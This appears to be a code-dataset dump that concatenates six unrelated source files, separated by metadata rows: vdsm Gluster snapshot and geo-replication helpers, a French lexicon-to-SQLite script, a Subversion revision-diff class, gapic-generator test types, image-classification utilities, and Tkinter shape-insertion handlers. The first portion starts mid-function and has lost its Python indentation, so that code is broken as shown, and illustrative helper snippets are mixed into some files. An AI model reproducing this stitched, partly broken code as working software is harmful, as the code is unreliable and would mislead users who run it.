for el in tree.findall('snapInfo/snapshots/snapshot'):
snapshot = {}
snapshot['id'] = el.find('uuid').text
snapshot['description'] = "" if el.find('description') is None \
else el.find('description').text
snapshot['createTime'] = {
'epochTime': calendar.timegm(
time.strptime(el.find('createTime').text,
"%Y-%m-%d %H:%M:%S")
),
'timeZone': _TIME_ZONE
}
snapshot['snapVolume'] = el.find('snapVolume/name').text
status = el.find('snapVolume/status').text
if status.upper() == 'STARTED':
snapshot['snapVolumeStatus'] = SnapshotStatus.ACTIVATED
else:
snapshot['snapVolumeStatus'] = SnapshotStatus.DEACTIVATED
snapshot['name'] = el.find('name').text
volume[volumeName]['snapshots'].append(snapshot)
return volume
def _parseAllVolumeSnapshotList(tree):
"""
{'v1': {'snapshots': [{'name': 'snap1_v1',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023-'
'a1a6-5093a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 141442711}
'snapVolume': '5eeaf23def3f446d898e1de8461a6aa7'
'snapVolumeStatus': 'ACTIVATED'}, ...],
'snapRemaining': 252},
'v2': {'snapshots': [{'name': 'snap1_v2',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023'
'-a1a6-1233a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 1414427114}
'snapVolume': '5eeaf23def3f446d898e1123461a6aa7'
'snapVolumeStatus': 'DEACTIVATED'}, ...],
'snapRemaining': 252},...
}
"""
volumes = {}
if int(tree.find('snapInfo/count').text) == 0:
return {}
for el in tree.findall('snapInfo/snapshots/snapshot'):
snapshot = {}
snapshot['id'] = el.find('uuid').text
snapshot['description'] = "" if el.find('description') is None \
else el.find('description').text
snapshot['createTime'] = {
'epochTime': calendar.timegm(
time.strptime(el.find('createTime').text,
"%Y-%m-%d %H:%M:%S")
),
'timeZone': _TIME_ZONE
}
snapshot['snapVolumeName'] = el.find('snapVolume/name').text
status = el.find('snapVolume/status').text
if status.upper() == 'STARTED':
snapshot['snapVolumeStatus'] = SnapshotStatus.ACTIVATED
else:
snapshot['snapVolumeStatus'] = SnapshotStatus.DEACTIVATED
snapshot['name'] = el.find('name').text
volumeName = el.find('snapVolume/originVolume/name').text
if volumeName not in volumes:
volumes[volumeName] = {
'snapRemaining': el.find(
'snapVolume/originVolume/snapRemaining').text,
'snapshots': []
}
volumes[volumeName]['snapshots'].append(snapshot)
return volumes
@gluster_mgmt_api
def snapshotInfo(volumeName=None):
command = _getGlusterSnapshotCmd() + ["info"]
if volumeName:
command += ["volume", volumeName]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotInfoFailedException(rc=e.rc, err=e.err)
try:
if volumeName:
return _parseVolumeSnapshotList(xmltree)
else:
return _parseAllVolumeSnapshotList(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def executeGsecCreate():
command = _getGlusterSystemCmd() + ["execute", "gsec_create"]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepPublicKeyFileCreateFailedException(rc,
out, err)
return True
@gluster_mgmt_api
def executeMountBrokerUserAdd(remoteUserName, remoteVolumeName):
command = _getGlusterSystemCmd() + ["execute", "mountbroker",
"user", remoteUserName,
remoteVolumeName]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepExecuteMountBrokerUserAddFailedException(rc,
out,
err)
return True
@gluster_mgmt_api
def executeMountBrokerOpt(optionName, optionValue):
command = _getGlusterSystemCmd() + ["execute", "mountbroker",
"opt", optionName,
optionValue]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepExecuteMountBrokerOptFailedException(rc,
out, err)
return True
@gluster_mgmt_api
def volumeGeoRepSessionCreate(volumeName, remoteHost,
remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolCmd() + ["geo-replication", volumeName,
"%s::%s" % (userAtHost, remoteVolumeName),
"create", "no-verify"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepSessionCreateFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionDelete(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolCmd() + ["geo-replication", volumeName,
"%s::%s" % (userAtHost, remoteVolumeName),
"delete"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepSessionDeleteFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeHealInfo(volumeName=None):
command = _getGlusterVolCmd() + ["heal", volumeName, 'info']
try:
xmltree = _execGlusterXml(command)
return _parseVolumeHealInfo(xmltree)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeHealInfoFailedException(rc=e.rc, err=e.err)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeHealInfo(tree):
"""
{'bricks': [{'name': 'Fully qualified brick path',
'status': 'Connected/Not Connected'
'numberOfEntries': int,
'hostUuid': 'UUID'},...]
}
"""
healInfo = {'bricks': []}
for el in tree.findall('healInfo/bricks/brick'):
brick = {}
brick['name'] = el.find('name').text
brick['status'] = el.find('status').text
brick['hostUuid'] = el.get('hostUuid')
if brick['status'] == 'Connected':
brick['numberOfEntries'] = el.find('numberOfEntries').text
healInfo['bricks'].append(brick)
return healInfo
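# Illustrative sketch (assumed usage, not part of vdsm): summing pending
# self-heal entries from the structure built by _parseVolumeHealInfo() above.
# Note that 'numberOfEntries' is only present for bricks reported 'Connected'.
def _examplePendingHealEntries(volumeName):
    info = volumeHealInfo(volumeName)
    return sum(int(brick['numberOfEntries']) for brick in info['bricks']
               if brick['status'] == 'Connected')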
def exists():
try:
return os.path.exists(_glusterCommandPath.cmd)
except OSError as e:
if e.errno != os.errno.ENOENT:
raise
return False
| gpl-2.0 | -3,423,247,115,054,638,000 | 36.208461 | 79 | 0.540643 | false | 4.196308 | true | false | false |
Krolov18/Languages | Nombres/Nombres.py | 1 | 3821 | # coding: utf-8
def fonction(lex_name, number_name):
import codecs
import pickle
numbers = pickle.load(open(number_name+'.pickle', 'rb')).get('français')
with codecs.open(lex_name, 'r', 'utf-8') as f:
f.readline()
# yield tuple([x.split('_')[1] for x in f.readline().strip().split('\t')]+["isinteger", "integer"])
for line in f:
tmp1 = [(0, "")]
tmp2 = line.strip().split('\t')
if tmp2[3] == "ADJ:num" or tmp2[0] in ["million", "milliard", "zéro"]:
tmp1 = [(1, number) for number in numbers if (
(
tmp2[0] == numbers.get(number).get('graphie')
) and (
tmp2[1] == numbers.get(number).get('phonologie')
)
)]
if not tmp1:
tmp1 = [(0, "")]
            yield tuple(tmp2) + tmp1[0]
def main():
import sqlite3
tmp = fonction("Lexique381.txt", "exceptions")
with sqlite3.connect('Lexique.db') as conn:
cursor = conn.cursor()
cursor.execute("""CREATE TABLE Lexique (
ortho STRING,
phon STRING,
lemme STRING,
cgram STRING,
genre STRING,
nombre STRING,
freqlemfilms2 STRING,
freqlemlivres STRING,
freqfilms2 STRING,
freqlivres STRING,
                                            infover STRING,
nbhomogr STRING,
nbhomoph STRING,
islem STRING,
nblettres STRING,
nbphons STRING,
cvcv STRING,
p STRING,
voisorth STRING,
voisphon STRING,
puorth STRING,
puphon STRING,
syll STRING,
nbsyll STRING,
cv_cv STRING,
orthrenv STRING,
phonrenv STRING,
orthosyll STRING,
cgramortho STRING,
deflem STRING,
defobs STRING,
old20 STRING,
pld20 STRING,
morphoder STRING,
nbmorph STRING,
isinteger STRING,
integer STRING
)""")
cursor.executemany(
'''INSERT INTO Lexique VALUES (
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?)''', tmp)
conn.commit()
def main2():
import sqlite3
with sqlite3.connect("Lexique.db") as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM Lexique where ortho = ?", ("vingt",))
print(cursor.fetchone())
if __name__ == '__main__':
main2()
| apache-2.0 | -6,603,716,984,891,004,000 | 37.371134 | 107 | 0.323383 | false | 5.238683 | false | false | false |
hbussell/pinax-tracker | apps/pyvcal/subversion/revisiondiff.py | 1 | 1037 | import os
from difflib import Differ
from pprint import pprint
from subvertpy import repos, ra, NODE_DIR, NODE_FILE
class RevisionDiff(object):
""" The set of changes needed to transform one revision into another """
def __init__(self, revision1=None, revision2=None):
super(RevisionDiff, self).__init__()
self._rev1 = revision1
self._rev2 = revision2
self.ra_api = self._rev2.get_ra_api()
def get_value(self):
"""Concatenation of Unified Diffs of resources between the revisions."""
# getting the revision id of the element to be diffed.
self.rev1_num = self._rev1.properties.revision_id
self.rev2_num = self._rev2.properties.revision_id
resource1 = str(self._rev1.get_resource().data)
resource2 = str(self._rev2.get_resource().data)
differ = Differ()
result = list(differ.compare(resource1, resource2))
return ''.join(result)
value = property(get_value)
| mit | -2,076,341,176,303,375,000 | 28.4 | 80 | 0.621022 | false | 3.898496 | false | false | false |
googleapis/gapic-generator-python | tests/unit/samplegen/common_types.py | 1 | 3695 | # Copyright (C) 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import dataclasses
import itertools
from collections import namedtuple
from typing import (Any, Dict, Iterable, Optional)
from google.protobuf import descriptor_pb2
from gapic.schema import wrappers
# Injected dummy test types
@dataclasses.dataclass(frozen=True)
class DummyMethod:
input: bool = False
output: bool = False
lro: bool = False
void: bool = False
paged_result_field: bool = False
client_streaming: bool = False
server_streaming: bool = False
flattened_fields: Dict[str, Any] = dataclasses.field(default_factory=dict)
DummyIdent = namedtuple("DummyIdent", ["name"])
DummyMessage = namedtuple(
"DummyMessage", ["fields", "type", "options", "ident"])
DummyMessage.__new__.__defaults__ = (False,) * len(DummyMessage._fields)
DummyField = namedtuple("DummyField",
["message",
"enum",
"name",
"repeated",
"field_pb",
"meta",
"is_primitive",
"type"])
DummyField.__new__.__defaults__ = (False,) * len(DummyField._fields)
DummyService = namedtuple("DummyService", ["methods", "client_name"])
DummyApiSchema = namedtuple("DummyApiSchema",
["services", "naming", "messages"])
DummyApiSchema.__new__.__defaults__ = (False,) * len(DummyApiSchema._fields)
DummyNaming = namedtuple(
"DummyNaming", ["warehouse_package_name", "name", "version", "versioned_module_name", "module_namespace"])
DummyNaming.__new__.__defaults__ = (False,) * len(DummyNaming._fields)
def message_factory(exp: str,
repeated_iter=itertools.repeat(False),
enum: Optional[wrappers.EnumType] = None,
) -> DummyMessage:
# This mimics the structure of MessageType in the wrappers module:
# A MessageType has a map from field names to Fields,
# and a Field has an (optional) MessageType.
# The 'exp' parameter is a dotted attribute expression
# used to describe the field and type hierarchy,
# e.g. "mollusc.cephalopod.coleoid"
toks = exp.split(".")
messages = [DummyMessage({}, tok.upper() + "_TYPE") for tok in toks]
if enum:
messages[-1] = enum
for base, field, attr_name, repeated_field in zip(
messages, messages[1:], toks[1:], repeated_iter
):
base.fields[attr_name] = (DummyField(message=field, repeated=repeated_field)
if isinstance(field, DummyMessage)
else DummyField(enum=field))
return messages[0]
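# Illustrative usage (assumed, not part of the original tests): the dotted
# expression handed to message_factory() above yields a chain of DummyMessage
# objects linked through their fields, as sketched here.
def example_message_factory_chain():
    mollusc = message_factory("mollusc.cephalopod.coleoid")
    cephalopod = mollusc.fields["cephalopod"].message
    coleoid = cephalopod.fields["coleoid"].message
    return coleoid.type  # "COLEOID_TYPE"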
def enum_factory(name: str, variants: Iterable[str]) -> wrappers.EnumType:
enum_pb = descriptor_pb2.EnumDescriptorProto(
name=name,
value=tuple(
descriptor_pb2.EnumValueDescriptorProto(name=v, number=i)
for i, v in enumerate(variants)
)
)
enum = wrappers.EnumType(
enum_pb=enum_pb,
values=[wrappers.EnumValueType(enum_value_pb=v) for v in enum_pb.value]
)
return enum
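# Illustrative usage (assumed, not part of the original tests): building a
# small EnumType with the helper above. The enum name and variants are made up.
def example_enum_factory():
    color = enum_factory("Color", ["RED", "GREEN", "BLUE"])
    # Each value wraps an EnumValueDescriptorProto carrying the variant name.
    return [v.enum_value_pb.name for v in color.values]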
| apache-2.0 | -2,398,762,450,916,771,300 | 33.858491 | 110 | 0.628958 | false | 4.07387 | false | false | false |
craigcitro/pydatalab | solutionbox/image_classification/mltoolbox/image/classification/_util.py | 6 | 9918 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Reusable utility functions.
"""
import collections
import multiprocessing
import os
import tensorflow as tf
from tensorflow.python.lib.io import file_io
_DEFAULT_CHECKPOINT_GSURL = 'gs://cloud-ml-data/img/flower_photos/inception_v3_2016_08_28.ckpt'
def is_in_IPython():
try:
import IPython # noqa
return True
except ImportError:
return False
def default_project():
from google.datalab import Context
return Context.default().project_id
def _get_latest_data_dir(input_dir):
latest_file = os.path.join(input_dir, 'latest')
if not file_io.file_exists(latest_file):
raise Exception(('Cannot find "latest" file in "%s". ' +
'Please use a preprocessing output dir.') % input_dir)
with file_io.FileIO(latest_file, 'r') as f:
dir_name = f.read().rstrip()
return os.path.join(input_dir, dir_name)
def get_train_eval_files(input_dir):
"""Get preprocessed training and eval files."""
data_dir = _get_latest_data_dir(input_dir)
train_pattern = os.path.join(data_dir, 'train*.tfrecord.gz')
eval_pattern = os.path.join(data_dir, 'eval*.tfrecord.gz')
train_files = file_io.get_matching_files(train_pattern)
eval_files = file_io.get_matching_files(eval_pattern)
return train_files, eval_files
def get_labels(input_dir):
"""Get a list of labels from preprocessed output dir."""
data_dir = _get_latest_data_dir(input_dir)
labels_file = os.path.join(data_dir, 'labels')
with file_io.FileIO(labels_file, 'r') as f:
labels = f.read().rstrip().split('\n')
return labels
def read_examples(input_files, batch_size, shuffle, num_epochs=None):
"""Creates readers and queues for reading example protos."""
files = []
for e in input_files:
for path in e.split(','):
files.extend(file_io.get_matching_files(path))
thread_count = multiprocessing.cpu_count()
# The minimum number of instances in a queue from which examples are drawn
# randomly. The larger this number, the more randomness at the expense of
# higher memory requirements.
min_after_dequeue = 1000
# When batching data, the queue's capacity will be larger than the batch_size
# by some factor. The recommended formula is (num_threads + a small safety
# margin). For now, we use a single thread for reading, so this can be small.
queue_size_multiplier = thread_count + 3
# Convert num_epochs == 0 -> num_epochs is None, if necessary
num_epochs = num_epochs or None
# Build a queue of the filenames to be read.
filename_queue = tf.train.string_input_producer(files, num_epochs, shuffle)
options = tf.python_io.TFRecordOptions(
compression_type=tf.python_io.TFRecordCompressionType.GZIP)
example_id, encoded_example = tf.TFRecordReader(options=options).read_up_to(
filename_queue, batch_size)
if shuffle:
capacity = min_after_dequeue + queue_size_multiplier * batch_size
return tf.train.shuffle_batch(
[example_id, encoded_example],
batch_size,
capacity,
min_after_dequeue,
enqueue_many=True,
num_threads=thread_count)
else:
capacity = queue_size_multiplier * batch_size
return tf.train.batch(
[example_id, encoded_example],
batch_size,
capacity=capacity,
enqueue_many=True,
num_threads=thread_count)
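# Illustrative sketch (assumed usage, not part of this module): wiring
# read_examples() above into an input pipeline. The batch size is arbitrary and
# parsing of the encoded protos (the feature spec) is intentionally left out.
def _example_build_input(train_files, batch_size=32):
  example_ids, encoded = read_examples(train_files, batch_size, shuffle=True)
  # encoded holds serialized Example protos; they would normally be parsed
  # with tf.parse_example() using the preprocessing feature spec (not shown).
  return example_ids, encoded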
def override_if_not_in_args(flag, argument, args):
"""Checks if flags is in args, and if not it adds the flag to args."""
if flag not in args:
args.extend([flag, argument])
def loss(loss_value):
"""Calculates aggregated mean loss."""
total_loss = tf.Variable(0.0, False)
loss_count = tf.Variable(0, False)
total_loss_update = tf.assign_add(total_loss, loss_value)
loss_count_update = tf.assign_add(loss_count, 1)
loss_op = total_loss / tf.cast(loss_count, tf.float32)
return [total_loss_update, loss_count_update], loss_op
def accuracy(logits, labels):
"""Calculates aggregated accuracy."""
is_correct = tf.nn.in_top_k(logits, labels, 1)
correct = tf.reduce_sum(tf.cast(is_correct, tf.int32))
incorrect = tf.reduce_sum(tf.cast(tf.logical_not(is_correct), tf.int32))
correct_count = tf.Variable(0, False)
incorrect_count = tf.Variable(0, False)
correct_count_update = tf.assign_add(correct_count, correct)
incorrect_count_update = tf.assign_add(incorrect_count, incorrect)
accuracy_op = tf.cast(correct_count, tf.float32) / tf.cast(
correct_count + incorrect_count, tf.float32)
return [correct_count_update, incorrect_count_update], accuracy_op
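# Illustrative sketch (assumed usage): combining the two aggregated metrics
# above. Each helper returns (update_ops, value_op); the update ops are run per
# batch and the value ops are read once evaluation is finished.
def _example_metric_ops(logits, labels, loss_value):
  loss_updates, loss_op = loss(loss_value)
  accuracy_updates, accuracy_op = accuracy(logits, labels)
  return loss_updates + accuracy_updates, [loss_op, accuracy_op]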
def check_dataset(dataset, mode):
"""Validate we have a good dataset."""
names = [x['name'] for x in dataset.schema]
types = [x['type'] for x in dataset.schema]
if mode == 'train':
if (set(['image_url', 'label']) != set(names) or any(t != 'STRING' for t in types)):
raise ValueError('Invalid dataset. Expect only "image_url,label" STRING columns.')
else:
if (set(['image_url']) != set(names) and set(['image_url', 'label']) != set(names)) or \
any(t != 'STRING' for t in types):
raise ValueError('Invalid dataset. Expect only "image_url" or "image_url,label" ' +
'STRING columns.')
def get_sources_from_dataset(p, dataset, mode):
"""get pcollection from dataset."""
import apache_beam as beam
import csv
from google.datalab.ml import CsvDataSet, BigQueryDataSet
check_dataset(dataset, mode)
if type(dataset) is CsvDataSet:
source_list = []
for ii, input_path in enumerate(dataset.files):
source_list.append(p | 'Read from Csv %d (%s)' % (ii, mode) >>
beam.io.ReadFromText(input_path, strip_trailing_newlines=True))
return (source_list |
'Flatten Sources (%s)' % mode >>
beam.Flatten() |
'Create Dict from Csv (%s)' % mode >>
beam.Map(lambda line: csv.DictReader([line], fieldnames=['image_url',
'label']).next()))
elif type(dataset) is BigQueryDataSet:
bq_source = (beam.io.BigQuerySource(table=dataset.table) if dataset.table is not None else
beam.io.BigQuerySource(query=dataset.query))
return p | 'Read source from BigQuery (%s)' % mode >> beam.io.Read(bq_source)
else:
raise ValueError('Invalid DataSet. Expect CsvDataSet or BigQueryDataSet')
def decode_and_resize(image_str_tensor):
"""Decodes jpeg string, resizes it and returns a uint8 tensor."""
# These constants are set by Inception v3's expectations.
height = 299
width = 299
channels = 3
image = tf.image.decode_jpeg(image_str_tensor, channels=channels)
  # Note resize expects a batch_size, but tf_map suppresses that index,
# thus we have to expand then squeeze. Resize returns float32 in the
# range [0, uint8_max]
image = tf.expand_dims(image, 0)
image = tf.image.resize_bilinear(image, [height, width], align_corners=False)
image = tf.squeeze(image, squeeze_dims=[0])
image = tf.cast(image, dtype=tf.uint8)
return image
def resize_image(image_str_tensor):
"""Decodes jpeg string, resizes it and re-encode it to jpeg."""
image = decode_and_resize(image_str_tensor)
image = tf.image.encode_jpeg(image, quality=100)
return image
def load_images(image_files, resize=True):
"""Load images from files and optionally resize it."""
images = []
for image_file in image_files:
with file_io.FileIO(image_file, 'r') as ff:
images.append(ff.read())
if resize is False:
return images
# To resize, run a tf session so we can reuse 'decode_and_resize()'
# which is used in prediction graph. This makes sure we don't lose
# any quality in prediction, while decreasing the size of the images
# submitted to the model over network.
image_str_tensor = tf.placeholder(tf.string, shape=[None])
image = tf.map_fn(resize_image, image_str_tensor, back_prop=False)
feed_dict = collections.defaultdict(list)
feed_dict[image_str_tensor.name] = images
with tf.Session() as sess:
images_resized = sess.run(image, feed_dict=feed_dict)
return images_resized
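# Illustrative sketch (assumed usage): typical use of load_images() above
# before submitting instances for prediction. The GCS paths are placeholders.
def _example_load_for_prediction():
  files = ['gs://my-bucket/img1.jpg', 'gs://my-bucket/img2.jpg']  # hypothetical
  return load_images(files, resize=True)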
def process_prediction_results(results, show_image):
"""Create DataFrames out of prediction results, and display images in IPython if requested."""
import pandas as pd
if (is_in_IPython() and show_image is True):
import IPython
for image_url, image, label_and_score in results:
IPython.display.display_html('<p style="font-size:28px">%s(%.5f)</p>' % label_and_score,
raw=True)
IPython.display.display(IPython.display.Image(data=image))
result_dict = [{'image_url': url, 'label': r[0], 'score': r[1]} for url, _, r in results]
return pd.DataFrame(result_dict)
def repackage_to_staging(output_path):
"""Repackage it from local installed location and copy it to GCS."""
import google.datalab.ml as ml
# Find the package root. __file__ is under [package_root]/mltoolbox/image/classification.
package_root = os.path.join(os.path.dirname(__file__), '../../../')
# We deploy setup.py in the same dir for repackaging purpose.
setup_py = os.path.join(os.path.dirname(__file__), 'setup.py')
staging_package_url = os.path.join(output_path, 'staging', 'image_classification.tar.gz')
ml.package_and_copy(package_root, setup_py, staging_package_url)
return staging_package_url
| apache-2.0 | -7,569,009,637,302,798,000 | 36.007463 | 96 | 0.683807 | false | 3.497179 | true | false | false |
Balannen/LSMASOMM | atom3/Kernel/GraphicEditor/InsertHandlers.py | 1 | 13905 | # InsertHandlers.py
# Francois Plamondon
# Summer 2003
import Tkinter
import tkFileDialog
import tkMessageBox
import Graphics
import AbstractHandler as EventHandler
#the insert() method is implemented by the RectangleInsertHandler and OvalInsertHandler classes.
class GeneralBoxInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
raise NotImplementedError, "GeneralBoxInsertHandler is an abstract class"
def start(self):
"""start the handler"""
self.current = None
def stop(self):
"""stop the handler"""
return self.current
#canvas events
def onCanvasButton(self, event):
"""on button 1: insert a new box object (rectangle or oval)
on button 3: cancel current insertion"""
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.xy = []
self.xy.append(x)
self.xy.append(y)
self.xy.append(x+1)
self.xy.append(y+1)
self.current = self.insert()
elif event.num == 3:
if self.current != None:
self.editor.delete([self.current])
self.current = None
def onCanvasButtonMotion(self, event):
"""set xy[2], xy[3] to the new position of the mouse"""
if self.current != None:
newXY2 =event.x/self.zoom
newXY3 = event.y/self.zoom
if abs(newXY2 - self.xy[0]) >= 1 and abs(newXY3 - self.xy[1]) >= 1: #avoid zero width or height
self.xy[2] = newXY2
self.xy[3] = newXY3
self.current.setCoords(self.xy)
def onCanvasShiftButtonMotion(self, event):
"""set xy[2], xy[3] to make a square box"""
if self.current != None:
x = event.x/self.zoom
y = event.y/self.zoom
side = max(abs(x - self.xy[0]), abs(y - self.xy[1]))
if x > self.xy[0]:
self.xy[2] = self.xy[0] + side
else:
self.xy[2] = self.xy[0] - side
if y > self.xy[1]:
self.xy[3] = self.xy[1] + side
else:
self.xy[3] = self.xy[1] - side
self.current.setCoords(self.xy)
def onCanvasButtonRelease(self, event):
"""stop on button 1 release if insertion was not canceled"""
if event.num == 1 and self.current != None:
current = self.stop()
self.eventHandler.onInsertHandlerStopped(current)
# Rectangle Insertion handler
class RectangleInsertHandler(GeneralBoxInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
def insert(self):
"""insert a rectangle"""
return self.editor.createRectangle(self.xy)
# Oval Insertion handler
class OvalInsertHandler(GeneralBoxInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
def insert(self):
"""insert an oval"""
return self.editor.createOval(self.xy)
# Line Insertion handler
class LineInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
def start(self):
"""start the handler"""
self.current = None
def stop(self):
"""stop the handler"""
return self.current
#canvas events
def onCanvasButton(self, event):
"""on button 1: insert new line
on button 3: cancel current insertion"""
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.xy = []
self.xy.append(x)
self.xy.append(y)
self.xy.append(x)
self.xy.append(y)
self.current = self.editor.createLine(self.xy)
elif event.num == 3:
if self.current != None:
self.editor.delete([self.current])
self.current = None
def onCanvasButtonMotion(self, event):
"""set xy[2], xy[3] to the new position of the cursor"""
if self.current != None:
self.xy[2] = event.x/self.zoom
self.xy[3] = event.y/self.zoom
self.current.setCoords(self.xy)
def onCanvasShiftButtonMotion(self, event):
"""set xy[2], xy[3] to make a perfectly horizontal or vertical line, depending which one is closer"""
if self.current != None:
x = event.x/self.zoom
y = event.y/self.zoom
if abs(x - self.xy[0]) > abs(y - self.xy[1]):
self.xy[2] = x
self.xy[3] = self.xy[1]
else:
self.xy[2] = self.xy[0]
self.xy[3] = y
self.current.setCoords(self.xy)
def onCanvasButtonRelease(self, event):
"""stop on button 1 release if insertion was not canceled."""
if event.num == 1 and self.current != None:
current = self.stop()
self.eventHandler.onInsertHandlerStopped(current)
# Base class for Polyline and Polygon Insertion
class PolyInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
raise NotImplementedError, "PolyInsertHandler is an abstract class"
def start(self, smooth=0):
"""start the handler"""
self.current = None
self.smooth = smooth # smooth option
self.inserting = 0
def stop(self):
"""stop the handler. if there are less than 2 points, cancel insertion"""
if self.current != None:
if len(self.xy) < self.minimumCoords:
self.editor.delete([self.current])
self.current = None
return self.current
def create(self):
pass
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.inserting = 1
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
if self.current == None:
self.xy = []
self.xy.append(x)
self.xy.append(y)
self.xy.append(x)
self.xy.append(y)
self.current = self.create()
else:
self.xy.append(x)
self.xy.append(y)
self.current.setCoords(self.xy)
elif event.num == 3:
if self.inserting: #if button 1 also being pressed, cancel insertion
self.editor.delete([self.current])
self.current = None
self.inserting = 0
else:
self.stop()
self.eventHandler.onInsertHandlerStopped(self.current)
def onCanvasDoubleButton(self, event):
self.onCanvasButton(event)
def onCanvasButtonMotion(self, event):
if self.current != None and self.inserting:
x = event.x/self.zoom
y = event.y/self.zoom
self.xy[len(self.xy) - 2] = x
self.xy[len(self.xy) - 1] = y
self.current.setCoords(self.xy)
def onCanvasShiftButtonMotion(self, event):
if self.current != None and self.inserting:
x = event.x/self.zoom
y = event.y/self.zoom
if abs(x - self.xy[len(self.xy) - 4]) > abs(y - self.xy[len(self.xy) - 3]):
self.xy[len(self.xy) - 2] = x
self.xy[len(self.xy) - 1] = self.xy[len(self.xy) - 3]
else:
self.xy[len(self.xy) - 2] = self.xy[len(self.xy) - 4]
self.xy[len(self.xy) - 1] = y
self.current.setCoords(self.xy)
def onCanvasButtonRelease(self, event):
if event.num == 1:
self.inserting = 0
#fill color event
def onFillColor(self, color):
if self.current != None:
self.current.setFillColor(color)
#line width event
def onLineWidth(self, lineWidth):
if self.current != None:
self.current.setWidth(lineWidth)
class PolylineInsertHandler(PolyInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
self.minimumCoords = 4 # minimum number of coordinates to make a polyline
def create(self):
return self.editor.createLine(self.xy, smooth=self.smooth)
class PolygonInsertHandler(PolyInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
self.minimumCoords = 6 #minimum number of coordinates to make a polygon
def create(self):
return self.editor.createPolygon(self.xy, smooth=self.smooth)
def onOutlineColor(self, color):
if self.current != None:
self.current.setOutlineColor(color)
def onOutlineFillOption(self, option):
if self.current != None:
self.current.setOutlineOption(option[0])
self.current.setFillOption(option[1])
# Connector Insertion handler
class ConnectorInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createConnector([x,y])
self.eventHandler.onInsertHandlerStopped(self.current)
#Image Insertion Handler
class ImageInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
filename = tkFileDialog.askopenfilename(title="Open Image File",
filetypes=[("GIF files", "*.gif"),("All files", "*")] )
self.editor.root.focus_force()
if( filename != "" and filename[-4:].upper() == '.GIF' ):
                try:
                    self.current = self.editor.createImage([x,y], filename)
                except Exception:
tkMessageBox.showerror("Open Image File","Cannot open file:\nFormat not recognized")
self.eventHandler.onInsertHandlerStopped(None)
return
self.eventHandler.onInsertHandlerStopped(self.current)
return
else:
self.eventHandler.onInsertHandlerStopped(None)
return
# Text Insertion Handler
# The encapsulation of TextGF is broken here. Tkinter provides text editing
# capabilities that are used directly on the text item of the TextGF object.
